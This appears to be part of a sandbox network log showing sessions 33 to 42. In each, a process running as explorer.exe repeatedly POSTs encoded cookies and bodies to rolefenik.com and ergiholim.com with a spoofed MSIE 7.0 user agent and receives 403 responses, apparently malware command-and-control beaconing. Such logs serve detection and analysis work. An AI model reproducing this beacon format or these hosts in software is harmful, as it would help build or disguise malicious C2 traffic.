                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M1Br7FOZ151Tv30JiSJIA%2BG69PshIZ4krip%2ByRctCjYM7F7xrak0Lgeq18xYHGIFZynO2m6IuBlu2zMNakmI01SWLVI6vTaHouhlcVcN%2Bv1MJNV25QUJUDzMvyCssOTu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071a20fed2cda-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1190&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=2399337&cwnd=251&unsent_bytes=0&cid=d6a04af6bf06d8e1&ts=445&x=0"
2024-11-13 17:22:26 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.6 | 50024 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:27 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:27 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:28 UTC | 754 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:27 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mgN0FB79osoJyRci%2FeCvE1W7OI%2B%2F6ihZO%2FePWO0VnjQcFYBRypV436ZfXkKOC5CPZwhl49g8PjWsbGF%2BxZqLoZ3cMRqwBIdl37fY%2Bg0HMOYaVWfbqzdNxdd058WX5muj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071aaf830d788-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=140398&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20792&cwnd=32&unsent_bytes=0&cid=eb26554afb95e4d0&ts=524&x=0"
2024-11-13 17:22:28 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 50025 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:28 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:28 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:28 UTC | 757 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:28 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rcFAKmcPK%2FfaSbJkFjXc640Ez8Q5wgYPphAlYKHZ5uIXdo%2FtTNbsqqNBXSX3bPma%2BslqctQEWENEYZgYxaDNRGRcRu7%2B6GHcSF%2Fbr%2BYeFHUQeMIvujiItHzCgwUDbF%2FJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071b1bb5a2e2d-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1172&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=2327974&cwnd=251&unsent_bytes=0&cid=5f04bb50528df183&ts=310&x=0"
2024-11-13 17:22:28 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.6 | 50026 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:29 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:29 UTC | 92 | OUT |
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:30 UTC | 754 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:30 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pG1ab5j64LTO5VlvQFPJ9hpdQ7ApwPNJeHya0C0Jny%2BU73gy%2BJDUpKt%2B6hC7C2wAitunGRWqVOCU3UHLyt6Kr1kcqzjsyhy6JkeXwIClmX%2Fmg4Dnm3RW56d%2Bfcz%2F2g2Z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071b9b8a9d789-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=136298&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=21590&cwnd=32&unsent_bytes=0&cid=11014f91d1b0694a&ts=501&x=0"
                                                                                                                                          2024-11-13 17:22:30 UTC | 555 | IN |
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          36 | 192.168.2.6 | 50027 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:31 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:31 UTC | 92 | OUT |
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:32 UTC | 746 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:32 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J4CEvNqd1v0qYqo6RQznhEInlRAWxV3pk2KvGxBeHx4aN80RVWcAbvStI%2BrYqrmeiuWsBkAzo7tPhGpbkOTi0SK0P338Dzhyv9FWZ%2FnVzfFTbdtaWtSfy6g2dkEaibgx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071c33fb1685d-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=132792&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=20103&cwnd=32&unsent_bytes=0&cid=47b11e534a4395f7&ts=795&x=0"
                                                                                                                                          2024-11-13 17:22:32 UTC | 555 | IN |
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          37 | 192.168.2.6 | 50028 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:33 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:33 UTC | 92 | OUT |
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:33 UTC | 744 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:33 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=looL4GtvGtqxvJGrm30yz67anykEXAnUj5QKUxtvWzIwSlGE4QXXlOOetn0HNJx5O3A0w2PqKIPjiWua5LVqGSLhtII5Q8flFpcBOLbQCptSMDJNNIlLw13x%2BDicwIGT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071cdaa86d74f-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=131167&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=22087&cwnd=32&unsent_bytes=0&cid=b863c50b1855407b&ts=500&x=0"
                                                                                                                                          2024-11-13 17:22:33 UTC | 555 | IN |
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          38 | 192.168.2.6 | 50030 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:34 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:34 UTC | 92 | OUT |
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:35 UTC | 752 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:34 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7hNIQVOpAzqNsdNNHBHV%2FvFwndl2u2sxsybbCGkIYB3DP57B2a%2FUze6zFwxiBbdHxdNgf%2BzcrPpucygnzt%2FwCVTd%2FQJKp12ZSyJAIRjgsCNSzimWHxnveGuWll3zKyHu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071d67c24d77c-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=130451&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=22215&cwnd=32&unsent_bytes=0&cid=94ba1ae2536a3aa2&ts=541&x=0"
                                                                                                                                          2024-11-13 17:22:35 UTC | 555 | IN |
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          39 | 192.168.2.6 | 50032 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:35 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:35 UTC | 92 | OUT |
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:35 UTC | 747 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:35 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJKkUz73wRceL473RknB4%2BPgUgX12fygoQM2NXTN00Sysh1fFnIfvhZ3y1ivctuJBd%2Bfv9WX4R1kDx2FjE9WOnbUhNrrn5xMgmn4swu5JpCRDVhhj9vL8vawGopGuXG7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071dd5a64e817-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1137&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=2375717&cwnd=251&unsent_bytes=0&cid=868425edc2d6e922&ts=281&x=0"
                                                                                                                                          2024-11-13 17:22:35 UTC | 555 | IN |
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          40 | 192.168.2.6 | 50033 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:37 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:37 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:37 UTC | 754 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:37 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMlMh02vCQU%2FlII1ulaV2haT7STWruKNjwRC4%2Fw7%2B9ttYl6wUE%2BKBnt4Y0dyASecOQE%2BdGn6ZNVukm1yUcZjIz4y0hZQd9PQ3qvr%2BvXlURCvSbCvdUkd9VIVaFWKoUrM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071e74f26261d-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=159367&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=19117&cwnd=32&unsent_bytes=0&cid=88ab9a15cedb4e4c&ts=836&x=0"
                                                                                                                                          2024-11-13 17:22:37 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:37 UTC | 5 | IN | Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          41 | 192.168.2.6 | 50034 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:39 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:39 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:40 UTC | 746 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:40 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NNMlHNXzpfNwQZAx9lMXuoSJ%2BGnRnbXldxWkFOJPK8HQFVAwn8oLiSZ88DDZnMQQ6JIIj0Loy%2BkgZ0qSwm8zWTd0Z1RJGtdl7WOeSqKXNSb2BuyUh1uJbaHLhrP51Yxu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071f82e2ad765-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=130920&sent=4&recv=6&lost=0&retrans=1&sent_bytes=2828&recv_bytes=1167&delivery_rate=22214&cwnd=32&unsent_bytes=0&cid=d534c45c318cfaa6&ts=514&x=0"
                                                                                                                                          2024-11-13 17:22:40 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:40 UTC | 5 | IN | Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          42 | 192.168.2.6 | 50035 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:41 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:41 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:41 UTC | 749 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:41 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ENnTiihMrRpFRybnPpJyEoMSGd%2BnF2faMZWuA4G1euuaPmASzKur3lq3B2U1EGNdN97Od1pS1W%2F00Blc5WU76yKXe%2FMU01zUo0RkTKjAQGRbtH11fCjJGvXvHwaIUIzc"}],"group":"cf-nel","max_age":604800}
